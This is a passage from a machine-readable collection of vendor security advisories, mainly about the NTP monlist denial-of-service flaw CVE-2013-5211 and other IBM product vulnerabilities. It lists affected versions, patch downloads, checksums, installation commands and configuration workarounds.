Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement**\n\nThese vulnerabilities were reported to IBM by Alejandro Alvarez Bravo.\n\n**Change History** \n14 July 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: Three potential vulnerabilities in IBM GCM16/GCM32 Global Console Managers (CVE-2014-3085, CVE-2014-3081, CVE-2014-3080)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-6718", "CVE-2014-3080", "CVE-2014-3081", "CVE-2014-3085"], "modified": "2019-01-31T01:25:01", "id": "368FC228DF101BC0EA89FB38D14DD38F0BD495576A532938022C431464F0DFB1", "href": "https://www.ibm.com/support/pages/node/865102", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:53:09", "description": "## Summary\n\nIBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)\n\n## Vulnerability Details\n\n## Abstract\n\nIBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5772](<https://vulners.com/cve/CVE-2013-5772>) \n** \nDescription:** Unspecified vulnerability in the Java SE component in allows remote attackers to affect integrity via unknown vectors related to jhat. \nCVSS Base Score: 2.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88007> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/N:I/P:A/N)\n\n**CVE-ID:** [CVE-2013-5803](<https://vulners.com/cve/CVE-2013-5803>) \n** \nDescription:** Unspecified vulnerability in Java allows remote attackers to affect availability via vectors related to JGSS. \nCVSS Base Score: 2.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88008> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/N:I/N:A/P)\n\n**CVE-ID:** [CVE-2013-5372](<https://vulners.com/cve/CVE-2013-5372>) \n** \nDescription:** The XML4J parser allows remote attackers to cause a denial of service via a crafted XML document that triggers expansion for many entities.. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/86662> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/M:Au/N:C/N:I/N:A/P)\n\n**CVE-ID:** [CVE-2013-5780](<https://vulners.com/cve/CVE-2013-5780>) \n** \nDescription:** Unspecified vulnerability in Java allows remote attackers to affect confidentiality via unknown vectors related to Libraries. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88001> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n**CVE-ID:** [CVE-2014-0411](<https://vulners.com/cve/CVE-2014-0411>) \n** \nDescription:** Unspecified vulnerability in Java allows remote attackers to affect confidentiality and integrity via vectors related to JSSE. \nCVSS Base Score: 4.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90357> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/P:I/P:A/N)\n\n## \n\n## Affected products and versions\n\nFrom the FSM command line enter **smcli lsconfig -V** to determine the level of FSM installed.\n\n * Flex System Manager 1.1.x.x\n * Flex System Manager 1.2.0.x\n * Flex System Manager 1.2.1.x\n * Flex System Manager 1.3.0.x\n * Flex System Manager 1.3.1.x\n * Flex System Manager 1.3.2.x\n\n### Non-affected products and versions\n\nAll versions are affected\n\n## Remediation:\n\nProduct | VRMF | APAR | Remediation \n---|---|---|--- \nFlex System Manager | 1.1.x.x | IT03235 | Upgrade to FSM 1.3.2.0, or open a PMR with support to request an APAR. \nFlex System Manager | 1.2.0.x | IT03235 | [ fsmfix1.2.0.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.0.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.2.1.x | IT03235 | [ fsmfix1.2.1.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.2.1.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.0.x | IT03235 | [ fsmfix1.3.0.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.0.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.1.x | IT03235 | [ fsmfix1.3.1.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.1.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \nFlex System Manager | 1.3.2.x | IT03235 | [ fsmfix1.3.2.0_IT03235](<http://www.ibm.com/support/fixcentral/systemx/quickorder?parent=Flex+System+Manager+Node&product=ibm/systemx/8731&&platform=All&function=fixId&fixids=fsmfix1.3.2.0_IT03235&includeRequisites=1&includeSupersedes=0&downloadMethod=ddp&source=fc>) \n \n \n\n\n## Workaround(s) & Mitigation(s):\n\nNone Known \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n6 August 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-5372", "CVE-2013-5772", "CVE-2013-5780", "CVE-2013-5803", "CVE-2014-0411"], "modified": "2019-01-31T01:25:01", "id": "374A6C3A0CE569B825764739B7B6CA7FCCA4751B7295B1136B25E6F356FE8EBD", "href": "https://www.ibm.com/support/pages/node/865174", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2021-06-08T18:45:10", "description": "*These BIG-IP, Enterprise Manager, and BIG-IQ versions use an affected version of NTP, but are not remotely vulnerable as the query operation is allowed only on localhost in our distribution.\n\nRecommended action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\n**ARX**\n\nTo mitigate this vulnerability, you should not expose the ARX public interface to NTP queries.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "f5", "title": "SOL15154 - NTP vulnerability CVE-2013-5211", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-04-10T00:00:00", "id": "SOL15154", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/100/sol15154.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2023-09-13T08:02:08", "description": " \n\n\nThe monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. ([CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>)) \n\n\nImpact \n\n\nA malicious remote attacker may cause a disruption of service.\n", "cvss3": {}, "published": "2014-04-10T18:47:00", "type": "f5", "title": "NTP vulnerability CVE-2013-5211", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2016-01-08T23:15:00", "id": "F5:K15154", "href": "https://support.f5.com/csp/article/K15154", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "amazon": [{"lastseen": "2023-07-28T06:56:17", "description": "**Issue Overview:**\n\nThe monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. (CVE-2013-5211)\n\n \n**Affected Packages:** \n\n\nntp\n\n \n**Issue Correction:** \nRun _yum update ntp_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.aarch64 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.i686 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 ntp-perl-4.2.8p15-3.amzn2.0.4.noarch \n \u00a0\u00a0\u00a0 ntp-doc-4.2.8p15-3.amzn2.0.4.noarch \n \n src: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.src \n \n x86_64: \n \u00a0\u00a0\u00a0 ntp-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 ntpdate-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 sntp-4.2.8p15-3.amzn2.0.4.x86_64 \n \u00a0\u00a0\u00a0 ntp-debuginfo-4.2.8p15-3.amzn2.0.4.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2013-5211](<https://access.redhat.com/security/cve/CVE-2013-5211>)\n\nMitre: [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>)\n", "cvss3": {}, "published": "2021-09-08T23:35:00", "type": "amazon", "title": "Medium: ntp", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2021-09-15T17:51:00", "id": "ALAS2-2021-1706", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1706.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "mageia": [{"lastseen": "2023-09-12T16:39:56", "description": "The \"monlist\" command of the NTP protocol is currently abused in a DDoS reflection attack. This is done by spoofing packets from addresses to which the attack is directed to. The ntp installations itself are not target of the attack, but they are part of the DDoS network which the attacker is driving (CVE-2013-5211). ** IMPORTANT ** Note: the workaround for this issue is not a change in the software, but instead is a change in the default configuration. In most cases, the configuration change will need to be made manually by administrators in the /etc/ntp.conf file, as the package will only install the updated configuration as /etc/ntp.conf.rpmnew. The following lines should be added to the end of /etc/ntp.conf: # Permit time synchronization with our time source, but do not # permit the source to query or modify the service on this system. restrict default nomodify notrap nopeer noquery \n", "cvss3": {}, "published": "2014-01-31T16:44:56", "type": "mageia", "title": "Updated ntp packages work around security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-31T16:44:56", "id": "MGASA-2014-0032", "href": "https://advisories.mageia.org/MGASA-2014-0032.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "aix": [{"lastseen": "2023-09-12T18:15:19", "description": "\nIBM SECURITY ADVISORY\n\nFirst Issued: Thu Jun 12 16:24:51 CDT 2014\nUpdated: Tue Jul 1 12:35:38 CDT 2014\nUpdate: Corrected public key URL.\nUpdated: Wed Jul 2 15:20:29 CDT 2014\nUpdate: Added published advisory OpenSSL signature file.\nUpdated: Thu Jul 3 07:42:49 CDT 2014\nUpdate: Renamed tar file for TNC compliancy\n|Updated: Mon Jul 7 14:26:45 CDT 2014\n|Update: Corrected APAR Availability\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\nhttps://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc\n\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Network Time Protocol (NTP) vulnerability in AIX\n\nPLATFORMS: AIX 5.3, 6.1 and 7.1 releases\n VIOS 2.2.*\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below\n\nCVE Numbers: CVE-2013-5211 CVSS=5.0\n\nReboot required? NO\nWorkarounds? YES\n\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION \n \n The monlist feature in ntpd in NTP allows remote attackers to\n cause a denial of service (traffic amplification) via forged\n (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests.\n\nII. CVSS\n\n CVSS Base Score: 5.0\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/90143 for the current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n The following fileset levels are vulnerable:\n\n NTPv3:\n\n AIX Fileset Lower Level Upper Level KEY\n -------------------------------------------------------\n bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs\n bos.net.tcp.client 6.1.7.0 6.1.7.20 key_w_fs\n bos.net.tcp.client 6.1.8.0 6.1.8.17 key_w_fs\n bos.net.tcp.client 6.1.9.0 6.1.9.1 key_w_fs \n bos.net.tcp.client 7.1.1.0 7.1.1.20 key_w_fs\n bos.net.tcp.client 7.1.2.0 7.1.2.17 key_w_fs\n bos.net.tcp.client 7.1.3.0 7.1.3.2 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ---------------------------------------------------------\n bos.net.tcp.client 6.1.7.0(2.2.1.0) 6.1.7.20(2.2.1.8)\n bos.net.tcp.client 6.1.8.0(2.2.2.0) 6.1.8.17(2.2.2.4)\n bos.net.tcp.client 6.1.9.0(2.2.3.0) 6.1.9.1 (2.2.3.2)\n\n NTPv4:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n ntp.rte 6.1.6.0 6.1.6.1 key_w_fs\n ntp.rte 7.1.0.0 7.1.0.1 key_w_fs\n\n AIX Fileset (VIOS) Lower Level Upper Level\n --------------------------------------------------------\n ntp.rte 6.1.6.0(2.2.1.0) 6.1.6.1(2.2.1.8)\n ntp.rte 6.1.6.0(2.2.2.0) 6.1.6.1(2.2.2.4)\n ntp.rte 6.1.6.0(2.2.3.0) 6.1.6.1(2.2.3.2)\n\n NOTE: To find out whether the affected filesets are installed on your\n systems, refer to the lslpp command found in AIX user's guide.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to the problem:\n\n NOTE: APARs are only applicable to NTPv3. For NTPv4 refer to steps mentioned\n in FIXES section under NTPv4 heading below.\n\n AIX Level APAR number Availability KEY\n -------------------------------------------------------------\n| 5.3.12 IV59636 NOW (ifix-only) key_w_apar\n| 6.1.8 IV58068 12/31/2014 SP6 key_w_apar\n| 6.1.9 IV56213 10/24/2014 SP4 key_w_apar\n| 7.1.2 IV55365 12/31/2014 SP6 key_w_apar\n| 7.1.3 IV56324 10/24/2014 SP4 key_w_apar\n\n VIOS Level APAR number Availability\n ---------------------------------------------------\n| 2.2.2 IV58068 12/31/2014 2.2.2.5\n| 2.2.3 IV56213 10/24/2014 2.2.3.4\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV59636\n http://www.ibm.com/support/docview.wss?uid=isg1IV58068\n http://www.ibm.com/support/docview.wss?uid=isg1IV56213\n http://www.ibm.com/support/docview.wss?uid=isg1IV55365\n http://www.ibm.com/support/docview.wss?uid=isg1IV56324\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n NTPv3 (Network Time Protocol Version 3)\n =======================================\n\n Fixes for NTPv3 are available. The fixes can be downloaded via ftp\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_fix.tar\n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n --------------------------------------------------\n 5.3.12.9 IV59636s9a.140423.epkg.Z key_w_fix\n 6.1.7.9 IV58413s9a.140421.epkg.Z key_w_fix\n 6.1.8.4 IV58068s4a.140421.epkg.Z key_w_fix\n 6.1.9.2 IV56213s1a.140421.epkg.Z key_w_fix\n 7.1.1.9 IV56575s9a.140421.epkg.Z key_w_fix\n 7.1.2.4 IV55365s4a.140421.epkg.Z key_w_fix\n 7.1.3.2 IV56324s2a.140522.epkg.Z key_w_fix\n\n VIOS Level Interim Fix (*.Z)\n ------------------------------------\n 2.2.1.8 IV58413s9a.140421.epkg.Z\n 2.2.2.4 IV58068s4a.140421.epkg.Z\n 2.2.3.2 IV56213s1a.140421.epkg.Z\n\n To extract the fixes from the tar file:\n tar xvf ntp_fix.tar \n cd ntp_ifix\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the followng:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n ed2aa3b4f2076fd24808e20ef32ff7ee70d2c0ff39092954045ef7163b80541a IV59636s9a.140423.epkg.Z key_w_csum\n a319f02951cbb95a028f75de2548df53c8ad159383b67df5264f8c25fc202cc5 IV58413s9a.140421.epkg.Z key_w_csum\n 3cdd922dae20c9ffab304badbbe6f8fd893bc057515ecc860aa5afca8867261f IV58068s4a.140421.epkg.Z key_w_csum\n 014f4cf77b7c3dd0ad94191211da197c6be5b900224db1ec25f5b5bf3506f690 IV56213s1a.140421.epkg.Z key_w_csum\n 4de291d684a6eec060398086637d0fe7441aaa2e84618313d4662f2ed564a879 IV56575s9a.140421.epkg.Z key_w_csum\n 649feede9f57aa537b09f350cddbcc1d7a16b782a935bc7a5b4ffbd47bce7fb3 IV55365s4a.140421.epkg.Z key_w_csum\n 8ec8d0ed64d21642a9d95e43545daca1d9ac910730ee351a3d01fbd5d30c8acd IV56324s2a.140522.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/ntp_advisory.asc.sig\n\n\n NTPv4 (Network Time Protocol Version 4)\n =======================================\n\n A fix is available, and it can be downloaded from:\n\n https://www14.software.ibm.com/webapp/iwm/web/reg/download.do?source=aixbp&lang=en_US&S_PKG=NTPv4&cp=UTF-8\n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n NTPv3 (Network Time Protocol Version 3)\n =======================================\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n NTPv4 (Network Time Protocol Version 4) AIX 6.1\n ===============================================\n\n NTPv4 Install images v6.1.6.2 for AIX 6.1 ntp4-6.1.6.2.tar\n\n \tTo extract the fixes from the tar file \n \ttar -xvf ntp4-6.1.6.2.tar\n\n To preview the fix installation:\n\n cd ntp4-6.1.6.2\n installp -apYd . ntp\n\n To install the fix package:\n\n cd ntp4-6.1.6.2\n installp -aXYd . ntp\n \n For NTPv4 use on AIX 6.1, please follow steps in link \n\n http://publib.boulder.ibm.com/infocenter/aix/v6r1/topic/com.ibm.aix.files/doc/aixfiles/ntp.htm?resultof=%22%6e%74%70%34%22%20\n\n IMPORTANT: The fix will not take affect until any running xntpd\n servers have been stopped and restarted with the following\n commands:\n \n stopsrc -s xntpd\n startsrc -s xntpd\n\n NTPv4 (Network Time Protocol Version 4) AIX 7.1\n ===============================================\n\n NTPv4 Install images v7.1.0.2 for AIX 7.1 ntp4-7.1.0.2.tar\n\n To extract the fixes from the tar file \n\t\t\t\t\t\n \ttar -xvf ntp4-7.1.0.2.tar\n\t\n To preview the fix installation:\n\n cd ntp4-7.1.0.2\n installp -apYd . ntp\n\n To install the fix package:\n\n cd ntp4-7.1.0.2\n installp -aXYd . ntp\n \n For NTPv4 use on AIX 7.1, please follow steps in link \n\n http://publib.boulder.ibm.com/infocenter/aix/v7r1/topic/com.ibm.aix.files/doc/aixfiles/ntp.htm?resultof=%22%6e%74%70%34%22%20\n\n IMPORTANT: The fix will not take affect until any running xntpd\n servers have been stopped and restarted with the following\n commands:\n \n stopsrc -s xntpd\n startsrc -s xntpd\n\nV. WORKAROUNDS\n\n Use noquery in your default restrictions to block all status queries.\n\n Or\n\n Use disable monitor to disable the ntpdc -c monlist command while still \n allowing other status queries. \n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/systems/support\n\n and click on the \"My notifications\" link.\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any assistance.\n\nVII. ACKNOWLEDGMENTS:\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/\n CVE-2013-5211: https://vulners.com/cve/CVE-2013-5211\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "cvss3": {}, "published": "2014-06-12T16:24:51", "type": "aix", "title": "Network Time Protocol (NTP) vulnerability in AIX,Network Time Protocol (NTP) vulnerability in VIOS", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": 